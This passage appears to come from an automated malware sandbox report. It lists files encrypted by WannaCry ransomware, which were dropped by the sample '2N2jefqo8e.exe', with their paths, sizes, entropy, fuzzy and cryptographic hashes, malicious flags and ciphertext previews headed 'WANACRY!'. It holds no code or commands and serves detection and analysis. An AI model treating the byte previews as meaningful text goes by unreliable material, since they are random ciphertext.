                                SHA-512:92B5FFE56012C400F085E95EA68CE33F2F45FEC181C0E9E8C338D4C426DCD60BEB2AEDBA933B47A3E458A2EC77EF87A546E20C6019E51F934EB6522F8DAEC301
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....|.wD..F3..Yxu..L...&..c..Z..o.}.x.Y..".$%z.#Ns.n...\........./..r...s..A.2w.2....#F.D%....:.....W.C..^P0d...\.5.b.N;../.E..q9....ihf.kL0e.$.@..TM.k...^U.K.H..kw2..&..z.9.$.q.j.."M.i~...y.....0...}.....$.\..g..-...b.!.D~..%.U."...Z..$.F....t...!..............*..|'y^...Mq.j.=...e..Q.B.i...?@.uO.G...%._:.u..l...."...U.....*.Q+Z[...0q.t..E`>1.....\.....wt14....qP&.W....L...3#.DQ.....i<.7#d....~Y.1...S./.........U....bU..p....d..$.`./N..)..s.....Uf..m.....e.}.8M....W..880#.:xvt;.l.@S...o..Y.m..#....rG../........Y..7sS..C..X....\......6.LT`.1...2..3..@..v..K.....(9.@?.....].6...Y.M..%.J.....Z/...V..!.\...-.. ..b..........A..x...9..i......s.5...b....lr.{.........";.1...D.8..<...I.......o$..3.B...kRPJ.kA.......f.rRT"..=O...(.....7Y.k..d.............dM.4..:..w..a..x...9.>.....I.....5f....rZ..G....Vl..p.|t../...1>....9.....=.{....k..F%&X..;.5zX.&:...o)3....DT..0....{....`.>...L.... k.d.+..T..I{m...@...].L..._...%..'.]&\39..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40328
                                Entropy (8bit):7.994770624576006
                                Encrypted:true
                                SSDEEP:768:zNm4oTk9t+VBuSb6bkocH0QsfrBhzv5K90k2kxI7Rh:5ETk9t+V90QsfrS2D7Rh
                                MD5:86AF0EFA74A74C71BD847B8E98E9DF3E
                                SHA1:32AEB9F7F0194E202640EDA7B4CD0F5054FB2038
                                SHA-256:B619038072C0109DB085BD43681AD701371086D1AFE5152DC1F357F17C913632
                                SHA-512:1935D570153AA003987A982FBB00EECAB96C0AC8BC033872FE3C20C39FE5D8F985B64970AA319D49E83EB339132F2A362C50241FB2BEC021268E555949A4689F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........1....Q.KC.d.>.QG6#l.P\.w\0........q:...Z~....S(S..%.p.jN8M..#2.vc..c...$. .Y.IN...w).1;2"h.*edP.a.......6-e......*lC.}........xw..Q.t..Sh.O......zZ...0...;<q[..z..........7dIl,4.......TQ>L.%.{..m_.o`.K._<v.bfk....N(....74...0.R2Q.@.c.<..........n........B..F..E...q+..q.PY{...W..EM}$b@..\U.c...;>c..........EM`.....v...Xi...2.J.u.c...).L..F....o<..k<.lA.H....y....[......]..u..hK.S.g....g\G..xoR..x."t.........ZX...g&.E....:.X.UBE..|G...v..Q.]x.H..o.0.n.{8.mS#.L.C..}9Vc..X.....7.....>....y..B&..N..1U...&.kG..A.'?.V.....m..J.0..] .r'..T,....T..-.....`P3...ET).K..6....)....(Y...;*..lo%.I.5n/ .....5=4...=..pN.....-tF....j.Q..h[.>..Z...j......'.9.V.6z..S.}..+..[.......#..|?..I-.h...W.6.x.4.u.l.C..7\q.{?...{...}....&."h4.?....kb^.?...,IB....-..\n..~cw...7F\....;....Y..qa...6.".\.x.C...u..7...^.c!.].\.....S|^...(.uz.s.c........%..ky..0Z.o.Vx...]..w.....X..l\.....e.O.k..:..P.wg. s....HCB.A......X..*.GW..s..L.E.w.m..._'.E..>..(.....B

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):799560
                                Entropy (8bit):7.999788883461205
                                Encrypted:true
                                SSDEEP:24576:t8H7Mh0HdftRyCNmTe9oYsaAiyqBXiHP/in886:tPiHdf3yCNZ4iZBXiv/in886
                                MD5:857E37794294AD27DD71FE7FAD518708
                                SHA1:D0F5129A5D677317D4C06742C3DC91DA0244B6E2
                                SHA-256:D5638464EC02F8CCA459FFDB7B32573503DEA91F21CBED28E2E2D675305D3C80
                                SHA-512:3E2BC37A6F6D6EC629DD9F8C6E3AE0B9C67A68017DB963AC9199584A7E9B0A632E94D019EE4EFA8AEC4B3B9E94DB82B403FF7B08B3615078BBB583987A2F5C99
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....}.M.,_.3..D$..\.7... .a..aW.p.........S;.._..G.e.l..z.-...,T..w......W"..>F.+l..[.sf...I..(..\./......3.42.}....O)=.<pw....!..x....%..9?K..4.._...tEx.^\o..3.CCv....,..x.>9..eT2..3/gf..........E.X...Ts..A..#...%c.f..S.|..W.H.)....ABkP.j.1.F.....9...../2.......@...z2;)....0.d...t.iw..!...3...7.....\...R...^...9.c...|...V]..4.Q]...&...[.......b.ez.5...#.u...10z.V?........iF.%.9- ....z....\......0......lk...M.:d!<............A...b.....4.Z_..t..8...oz..!M.....3.C..`s.....bDdT..&....]...y.....yqS...?T7S..q...k...l.:.....s...V.Y.......j.t.....j.....{.e.B....%s"\%.W$.....-.P.dc.}b..G.% y:E...&.r2co,...8..);.....l.i..U..F.GDM...W.........@.....p...O.C.X..Q..H.aT4.X.X..........y8y...-|5>.eF............/.`.n|......s|..... f~.~.3..n)=.<}.~x.{.LzX..%V|..fu..ro.#.z...*7....-...D......^..$..y..$+..I...^g.Z.K.....i7...f.-s...?6......].2:q....a|..D...F.2=.....Df.......:f,.<....v...-..QJ..".#?].Z...^-...E..Hr...(...n..*y....WY7:.W...[.}.

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):89144
                                Entropy (8bit):7.998195851740088
                                Encrypted:true
                                SSDEEP:1536:rHsy5UKBGQ9KVnYXR4dJMeDIi9PeX9Dxpf3Fqg0T+/QfR+cVYXvtTJn:rlUKBGQ9KVnYXR4zM1iA9gg0NRNVYfzn
                                MD5:28C1F1C542F40B128268CD67F83A1649
                                SHA1:AD1D412AE5590C242603B6EF331B897E87FEBB4C
                                SHA-256:AEF1DB307348C0DCE0A7F668CF76349A447504FAE0477F14F2793AAF788D4E4E
                                SHA-512:1FDDA9773BC7B0E61506221B8153E63FE50D537B85FA2CA349E48F1F6E4AF6DAF1CD8CE748574261986E03F32E6B124FDA2AA5A187E980703C82E6F6434F5513
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......c.a.L....m...%.by.....%..X....4DP[..q5.8.GT...h.....}Y/..M[..V...tV2.P.IFp...WD..fm..\.x....Q.%....^...u.k'..p..=.5.G93.!..l...s)/.@...;Q.6k..z....b..j^.o...h8`..6..P...%1..8..j..........=.......+.%t...ZT....&...;ne?Wty..8....;..V~...2....o...2...... [......k.<l....j.......B.0.b....]...B...9d.....Sxy!.......}vSb.G....s....;...\.-.......KM........N$...c.......O'}...R.....r...;G...b.-....8O..s.... ..<@.[>.R@.2...?.>......^.yqm......I.81Lz..D.g...g.r...:,..`-;.Fm.'yB.r....).h...8O...K..*....%8.P..TI.....Z....;~......dF,Pi0..&&)... .....Ca......DY....f........O/}....(....tGH..O.WV....1.P8+..z.8......+J..\q..C..v..]Ap..eL"-.......xQ....L.zy.W...B}.%..0P..j2;...J....,...D~.BTgR..]...=....9.>..T...J..N)..pD..../.7.hEogo.....s..q.8......g. .B.s<E.mE.....Yl1..v.l"m..5..9....9..la~=!....*Z........w.R.#..m....,Gme.G...`S~iP%J.......t|.fb...H..aSz.c....q....B82.1..L.P9......4.cPp...Tq..81z...a?...:.....o_P.jK.C.y...]fd.q..\(...

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):186072
                                Entropy (8bit):7.99898605840687
                                Encrypted:true
                                SSDEEP:3072:43plQiwYlg5czwfxot7VywUKStM+Q++OxeoWnI24qLdj4VnDcqk0NbfsnTKVUhI:4LIYG5WwfO5+PxelIedjODcqk0Nbfsn0
                                MD5:2B5101D3A4C9640231CCC0338F202DDA
                                SHA1:245FDB1D00D674074706ABF05AF57AFF516A056B
                                SHA-256:DCAA3DCE6B5458301F096EE2A380DCCE19E501B6759950EFC95EF9606F766BF5
                                SHA-512:79A9F274A3986D7EA2CDF0B0990970147AE9A346961E519A8332CA19FEB98B8BC7ED502CFC45BDC43FF047678D4ADC0E3D063AD27FEF05295A84D14BB22C6CDF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......)9$]._..._...........O.?,.(..X...|e...z...Aj............;...M......,W.bg.C.8A.4.....]6..e..$..S.b..qv8..R...J6..D..)..6v.D....A..UU.<....:e0..OS..Z..5r|:......1..A...,(FU.. .o.S..[..B:O~6'....4........{.'.0..Bk$C.g.=..].rY@9.?..{.................]<.,L....&x......3...1.5.....\?....%..m...M.pX.,.........3..2.f.Oe.O .....s[.^1.........5.k6|........S`.........,.C...C....?.7,.d4....';'....x..].i...c&..f.%^..^N..h..{.a.ki.C.l..Q..q..k_nsH..7..N...y!X.C.V{..u..8..?]\...E......)5.L..........6..k.,......n.`.(.....[..d..Nz..\f=.[.,.=.p..J5j.F..C.)..TY.JA.].g38.....,.{.p.,.....9.<..I....\Y{#W.........W..\B..P.$#.d.&W^.7&..e..&....-{.."..r..S..4C.C_.]..Ve..y..*.t..(...{..9..qY.uB..u...Ko..(...@H.Y>&f0i.a....1C..$..p.@..$.......9..`~.......[.." ..:...U. !...5.C.......Y...)]..&"6'..:V..p.s.....\...i.b.@.J...E.DC-.o|..! ..g......D.w..j3.P......0..#..o- ....;..c.m.........=....(..*......9..$Fy....[....(..{...r~.l.Y..x.6

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_29[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17736
                                Entropy (8bit):7.988540576660658
                                Encrypted:false
                                SSDEEP:384:glmskKnYWeQGDYKqDio5m0RlHMCzwSzVx9y6a2CojO:gekkpjqD/mypzzx9y3Y6
                                MD5:345E6A36EA4025A3082906F7F9AB8FC3
                                SHA1:E510FD4488D5EF2F24E21AEDCE7296B51E84F7A3
                                SHA-256:D99E2AF89B0AE22D623EDB8F4222680C4C4BA269CF8F8BD49A5E9CAF6D8103AF
                                SHA-512:17922FC8325D2BCE0183B592E83D79994FC3398B294AEEB887351A82F08F928FD850E22B193D916E595C239396523F02AE45A768C8FF8CD8C59C365682FA2DEE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........\.._..q.68......c.l..X..,.=n....(.\.<F@.?....:.]s.V......f..Tp.6....g.1.Kf..3c.O....B....n....cQ........(`.6.?.4.>.}...."E.d.|..[l..l...5....)v&..L.Hez=0.N4\Pz..0=..B...............(T..J);L.....Z......?.6..{..s..?-..~...!..=.u........(D......@.S.7..(...;M...Y.016+_..@?.......L@>.p......{t..o/....=..;Eil...n?.L.~....z!.=.w....V.[t.....3.l*......U.u.Q....p.B.".K-0.+..b.....7....H.Z=...N.7..".B.RB..SVF`_...f!0.%.^...Y..K~....,Z<......X%dWmA_V..@g.y...T."..'..q.........)^..~........0..#....E#.B.5.].>Y..o.o.....Hw..CI.u..TM.hR.......7.h.[..9dO7...x_...5;.U.........:7..1...z~..ot..?#VN......_.L-..Z.;....r1!.fs...6...iF.-.]}..3..|.....Y...s.......48.,%(99..1t....B^..,y8U.O...O...A..r.."..._.....c.....}....R.6.zK....z...r].K.eb.....C...-BLg.o..`k....5v..._...=>A....J........gk(...'....&......11@....2Ob..*......3<..h....!./..^...G.;...S=..8......^.<8#...@g.s.l..B."...|........I.R^.......".9.L..^[....q......;....

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):73912
                                Entropy (8bit):7.997339375274032
                                Encrypted:true
                                SSDEEP:1536:M4m9jKp+mL2To5/4ZFOVwsVL85eQ9hANFddPl8:dSjzmOo5/4bYwsWc4hALP+
                                MD5:002F9474F6B144D511043CABF1EFB29B
                                SHA1:4037FB94EFF17EC26C4C956A152F57CE332EAA28
                                SHA-256:8457F673460CB4965856E531BEB643E603D2B7D2DF095CD59CCFFA3D29E7C698
                                SHA-512:042509C7434A8B003D78532164202D8A34B86E49E4B7E713E59CD76EECC32CA21110841DABE94135362BE7B6FFB6B7F03810658401A54D28E7387FD538FB7E0A
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....I...2GA..~...y. ...v....{$....-Zh!g....E!...(..d..r..R.....j{..A}..Faxs.[.....m.C..wb.=o...P..6.]..f.rNau.A.g..:.x}....U^j.J:.....*S..i...+.....G,.s\.0."...W.=..s\..}.s..... <.4..!._...Sur..].@M.5=..7w....F..,s.,...."...O...:.....)..Kof.S.".............z(.....E...t..^.b}......O...i...{.H.).I_.J. .<...Y.....e.F....../..".|.h.?^jp..=1m..c.1.$.V.Y...m#YP....Q...U=.7...{'..oG.Qj.g.,...8.Z..E..)...$|y..,....(..<....._A.!.hv.-,QX..:...nx._..<..._?....S.-3.....t.Sj.!6(..d.P\q../5.......k..8mI.....v.....m...:....LT.......q.I./..>mQ..K.X./.Pw..p.........K...E2..3..ct....#ti.......^...z..z..B+.N.....y...._........<.I/I.[..;..:Z.{..DY...[.V..Q.t...W..u..n...7.....13I?7S....RN..\..]g.T.........`i'+?...@.;{.K$T.t.,..R...2.Q.$^M1'..G..{G.IR..w.....xr..&./p...RI..E.d.. . ...I.1h.!...w.[.qr.......7..x.F...Kqq.u+....Rc......7@q....m..z.NW.O)|.A.}....\.<..U..r...I......3...P0q.....=u'.;0pk:....B.%..].<..P.....Z...x[aV.p.5.;....g.4..B..0j.D

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_3[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19336
                                Entropy (8bit):7.989886519735407
                                Encrypted:false
                                SSDEEP:384:ht7hUBeyWBTPMWC3otDzkVjo9JogsgILrnq0jT1A1PNOI8SQMDK:hdmBQJzCizkVjo0iUrq0jTi1P58QG
                                MD5:3639642B7094483ABCB4DBCA2BEDDAD1
                                SHA1:9B85592C282A291358E3A0C6CB99B5177B7A2F9A
                                SHA-256:FFB228408E056F76C40229F00C07CC0FD4DC4DA1F0AEACA2EDC4F21058494DA5
                                SHA-512:F9E62BB4235A7D341A5AB8A097A0D5EA0D869BE700D14598012AB1F4BD4897BC72F9C518F424D4FD03C5C1D4841A1062F7967B9CD1544CDC56E7ACBB18C58B5D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......v.......i......K....6..Z.m.0S...J^E'.M.E..u..[...p....Ro'.:b..X.L`..m......?.Xn:.k...,....g.....D.GN.Hd.D;Q....R..~!^.>.g..! ..!.AR.Dk*=+O.4.8xN.b <~`..Cj...1:H..:.h.....g6..~......h.....#.h.6...;3Tz.0~.-K.Q)...2n.YXvXM.N2S....{o..3.,.Q......c....pJ.......;...w...s)........+P."..9~.>...U.d.7.b..j.S/)+..~f.....J...<t..(....;$.lfJ...,[.....|........'P,....s.p....9.Z........_..... .......`....S..>.l.B...?..LF}N..hF.kD.3.:..L..n.}...z..M.r.h........8..........?..3.....[j.Z_0...Ne........3...<...Z"[.......)..4'....Gm.R..q.n..?.{.....Y..f..(#\7........hl,]W.t_1)B[..{...|.NnB..02....(.......9..n..........N}......>..6.@..cG.....T....B.l..^IP\+.....t.....c.....E"?..^...fc..Z....M......N.5$.Cc~..g....&\v.O....].....O..o|4J...yj..;.bD_.RX.E.(5W2.]t.@XG..n&}%3}^...\#H..i/......m.e.x..k.f&S.`m$6.......&NWD.......?o...Ej...{.:.j..I..DI.E...F~mC.:).....D.2.W~3-.}...e5"%B.t.J.._.=e.6..W.P......9.c..."...".H.U...n..oT&AE.y..!V^@..k...-..P(.......

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20680
                                Entropy (8bit):7.991114500397896
                                Encrypted:true
                                SSDEEP:384:6fF373w5y7p4sq7x0LqOVtFN8BQc6kB9fiJO5+xyX1J95utPa:6fB72y7p4sI4DrrkB9QO57X0a
                                MD5:271076DC28DC047D275E9623D49FA40E
                                SHA1:364F0250867D605D2E180ED7A07FC5BA2161F80D
                                SHA-256:12A1E23BCF821BEF4F37A3E8C4A78604EC3AE8F38C1BE31F574E114413406AF7
                                SHA-512:AEB9DAFEE92D3DBD875613AD1A56EBA9669453A9D6AC375508B04250C97FC2C148EEC8CBF117CFB78EAA10B9A00F1C036606F45A5DBAC653AC2DEE70EC6206F3
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....,..T....^LmX.8.....P..-<.k.V....X9..C...J..<.r..Y........|..l?.p...]..)..2>..G{..?.jV.2.&.7..8.*'....S...u.....j.7..(y....o.98..........."."..2.2.........H.......:Xf.a(.c..,^.....Pv[..{......8..q....O.....*k.=.'....W.N..$..z..'.^....H.w[.........O........q.2.eF.-.}.[.>..Y.}@...8.gF.."...0....c.z... ...;o.jC...R.j...!M?...{O....!...j$....*..?..^. ...g.>a..]u..^.?.C.q..~..>7..d.6..r.3A....?.Cg.T..*.gx&g...n..A.........H.d3..vb..j...P.3.n..uo.0[.;.....U.y...:.L^.....w..y\H.q..c.....q.._)...B..H.T......."..$......|..,..+5...FQ.....gQ......'6.....q.w..#.f....f%_...a.[_.2...Q....E.A.C._.....$........\1-...X.}.9.b..b..<._4.:......&.l.M>.5$;"..^y....ya.Ti.b,.....8N.2cl>..4..~.<d....^.H.A.+3...:K+5.\...m.5.Uz..|..IL..&...MGX.]....'"]QZ.M?M[...'....?{6c0...$E.f........!(.?.V.[....K.d..cX....p.W..@3..rQ.G.O..mT.@<%q.C..Ul..#.BN./..p...b..)....t.`.'..D.4,m.i...C.g......\Y..r.t.'7..1lq.0.....^...........C.,............Bc...j2.j.....%.~8.7

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_5[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):7.870503596825595
                                Encrypted:false
                                SSDEEP:48:bkwaL9rLGB/xzbtv6/LoLYpehSjgAkCaIFl7zJvIYabSmn:owaJmzs8Epey1auXJv9On
                                MD5:91BAFB1B719F870F604AE8E7E0A00222
                                SHA1:6D0F152CEBB7D740872258A6EC63A62C7B6ABABE
                                SHA-256:A7BF26DB8A17EA844D5FB0E2D024559A8185C738E85E9A65189BF0E08C1A0DB4
                                SHA-512:151E850AA29A5EAC4C711B44D2115D1C838C70331E4D22798480C9B5963CE3539258D927A6290D814AD617F43A9999A349698776C90B3624A3EA28F737F654D1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....;X.E4..\...$%.{..d.......T.y.vS...]...?A.......S.N...k.9.G...i%...i.6V....q.d.....t+.hy.q.....6YR.P.~Z.L.[.1_H{!J|.E...!.}`...X..{ L.Dk..'..+K.k.*>.N.F.].../..].Y.h.mV?n.....K.......#.`..;..Z..T.j....[.*.../..Z.:M.Rv..6.sD....(...[n:..aL..cG......$........l.,..w^9t.-.l..&.+..'n.....G...:U...Q..^..4........5y..0a=...#p.U..8%. .~.KM v......-K@.5>...KS_..5..viU._...\.t?....t..n..~%Y.N)..X:....&.^8%.SK|....U......i.......k..K3.Q.X..vo..,..7..3..1....F.[.n.5......x.*....;....p.E.@>$...c.!.s..._8.....C.....N.].V.N.{..N.(N.)..I~...A...p;...A.J9b.3B.cl...X )V..{...E...QW^W...X...v8...Y.J............_m....u.......[}(........q..A.........thh........^W3..I...;...M.Eu.eVG/.$..".W........W.qA...m.%..R.. ........e..%\b.5.xs...e....._".J.:..$...J...N(~9.z.e.%..("c.e..!:..U....&..j.B`....V.=......4..$..a...s>=.@.....#..q;..W.__.....J^$&.Q..N+....t|.hS,S...@f..K..)..|......cA..p.<....j......X.N....!.1@..L.V9.w.E~..."g.......N...".Q....d%._P.~....

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):37464
                                Entropy (8bit):7.994587542982609
                                Encrypted:true
                                SSDEEP:768:b9B4StTbu7V9gFVyMpEHcbz03L+Yo9Te+EVCwXY:bcmTy8FVyCE8bz03L+YN+ACwXY
                                MD5:F4938103BC30BE9C3766B94F337723CE
                                SHA1:CB447A8F7F87E305D5CB855A4605CDF2C24D0D27
                                SHA-256:C8DC3BEE97AC9A3D5E2DF9E4C7A59948A1529FBC5C7CE0DCE6C079108387ECC8
                                SHA-512:03E4948B77091860E7FC7BC4B7E85E535F8B6AE0DBA82F078135DA689ED16ABC2C5E13E212532A319BE8DA0DBD577CE39F8AD0D2432D2A5951D699DA3E1E4031
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!...."..=..^Y....Tak8oA.4.9."..p.AU..[....F...-[ }........4(....@.Ne.F.......o.2.x.T'.,..y.<.H:O.....Y....f-WeKy.m^..Rs..V.P..Q:.....~P..7.V..g...R...^.tf (dE.DS2.[.....k..V.1R?....%....#.......@.....`..5....C...rYd....po..V..N.<.o....I!.....5. .Q.u....=.............)...0+8:.o.-..w'..+...f..t.M..NGa.8)".Fq.Q#.^u-..Y'..Rh...2...b....4.V......!c.%q$~u3.......t..^....}..LX..~.-.(.j...,....R..$.}`I7%..Qh.U.,r.R.8.....^s....'..U..#U9.t.Z.b.q&P..D...J k79.[..:.j8......w....U...2..F...zW.y.......g.......:o.G2;q.b...2(..2..{TSWk..._....L^..9.Z....o<....._.$...E;UW.....>....yjC..!...0m..=.vY.....j..7..4r...3..a7S>Df)...6..T.C......~~..[..=..9gix.p..w.9.yXM.....:..q.\.x+."....U..u..'.a$n.l}..".oD..+mc.7..,F....D.'.....`..fU.-..D.{.Y_E.........C..i..e\Fi..%..uX,]..z..L.p..........W&{;5...n...1c...y....@....6^..6.Oi+...ya..)......`. .JL..hw..CLi...>...=....M)..<.@>..f..!A+<X...}..9.l.W0.......="t.../U..DY..s...-7....3..#.7...?..b$E...k

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):168968
                                Entropy (8bit):7.9989785551961194
                                Encrypted:true
                                SSDEEP:3072:Jw9UXCTr630xiXDKF9v1fK6Bf7yN9deBaNncN5N81q/vp7b/9PMqR:JoUXyr6kAkdpK6dyN9kgcNX8E3Jr9PMM
                                MD5:6E943240ABD34AC785765EF07802D85C
                                SHA1:532ACAAF3872E4169ECC95BA71F51353AE4A0BE0
                                SHA-256:A2B574165772A03EA57770ADD0438C5A07A86C7036918F4CA1397B2F4A2A598A
                                SHA-512:2A706FA33409BDABC8814CC051C67F4AEC2AC12FBDA4A21F27D44F7D7CC6E149C3ABA40C2EBC431E3E0128A8C3615719AF6746510CE6C3885912592945A3F587
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......X..l.?.w.._..W..:........H<.*..V..g:......Hv...D*.>Y.{:Wbb]..j.....F.4.....H. .u.}5Vzt..2..w7'].-..UQ.....@...x...H...F\..g....iH.c.L..q....L.*yR.p... ?6..]....,\...M....V..h*.........p..T...{...i>.t......:)8".1$.dD..$a:~X..+...3.(..w..!............Q.`...@l.V....x.*.@x5.@...$....p......>.....=B.?R....._.V.?].4Z.6-......E.D.k........,.......)'..6...@34y..g.mL.n.....AE)..:..E....FI.."g......E...2...[..B....`8.6Zv....}...D>R..s1!t5...I;..M.*%..........-K...}M!.GZ(.......[X.a...5..:.'UMr...{........U..:.f`/.*......L.|.....Ii.~.FF....M......W.|.CO..?..UDP....i.v.....J.-.y9...;.J.X.vl.6...G..M.V,J.+.!......l.rA.Y,e...v].U...Y.6..2..Z.......f..: .U.D.Y._v....4....D...y..K.2y.....gh.z....K.T.b...<....?....T...c...@.X.Z..C_.....Q.gC8.,.k|.....-....,E.$...5...S..s..ij]......"...W..HN0...g.u..!...........m..#..4../.......x.h...|.<..xg..A..]I.M.....P....v...k..6..Dd.:t./&..#...Fh..T..^.M...S...IzuZ..O.o:...r.........Q./.J.4:..

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):51224
                                Entropy (8bit):7.995672375915484
                                Encrypted:true
                                SSDEEP:1536:6v6OvH1VI/ubGMUBrP9x3N6jnwFsUxkY+q3:6SY1XK9BN6cFfx/r3
                                MD5:2B37747A713EFD334C93B3D16CEF456F
                                SHA1:7FA577A621C93F5A70023B7FA235E2402243DEB9
                                SHA-256:A92BDFF33DEB04071B4D1E0FD7DB647C85B2F1B7CF08C31BD6AD2E8E6EC8A268
                                SHA-512:032560553D88C47FA58BABD61F2CE66C4D5FD241F93295DC2B7902D25A24EB8AAB61526A837DCA86B445279B936EE4B25ABFD9ABAF8D003504EF228D846B90E1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....w..j5..S..5...t$.....G....2.....`.XAo|..0..E.:.2:............7..}ip..It."..o2J..Z.PC..g.;@..8..U....8./..S.,..;Z..k..E..\ ..E].\p-.9..j.W.Hj.uO<s.J.|6.7.~........5..NP....&-V...Tx2>.d....@.....'...zU^....v7....}f.......S...7jv..j...N....5!e..H............N.....R...<Z}r.p..e.g:.V.. ..i..../Wg.T..d...tT..0+.j.c..u...)...../0.T+....i.~...fJv..W.....'...@.!^.....tW?8.`.=...V.'Kv..9.<5<$.8..t.B..s.s...O@.^17.9..E.*G...kXPg.a.....hE.kK.)..[..`..zi7u..b.OM.7`..9?..iJ.jTb#9HI....AWA.G.........Q.q.s6..f.I^............U.....P.[....1....jB.^..S..7....A.\A.......3V\.J.( ms,.....Oq.W[qS.*.....m.+r.47.m<[.GmS...o...m..1..<o|.^.....fyH|;G..T......."..Nm.N.*...&......._8.";Mx..e......,/./........!.Xo.$.*<.hfW.g,........q.7..."..d..NG...8y*i.x..6-.UDt.zE.kf..z[..!.w.N.S.$$..K.2D.a.8&b|..-.u...},Ci]...gI.K..{..r.`..Q....[L.J.....!.-p..-...}C.J.oVV..1../..a..V.._.+3..-.W.....s.c....A..W.`..hx......,..XD......7&q.}....}.|.V5jTx.......WD...5......6$.n

                                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):69016
                                Entropy (8bit):7.997042868526277
                                Encrypted:true
                                SSDEEP:1536:w59iwmDiTVpqmj/ZGOh1IDKwu5jxBdqH8VWIy6sY9:m9dmDwZb4OLIDvu5VBdqiWIyq
                                MD5:F411D6F1D8E15E8EC6ED3D4C760F76B8
                                SHA1:FFFE32DB8F0DA72AB8F06D0BFA6FFBF6249A63C1
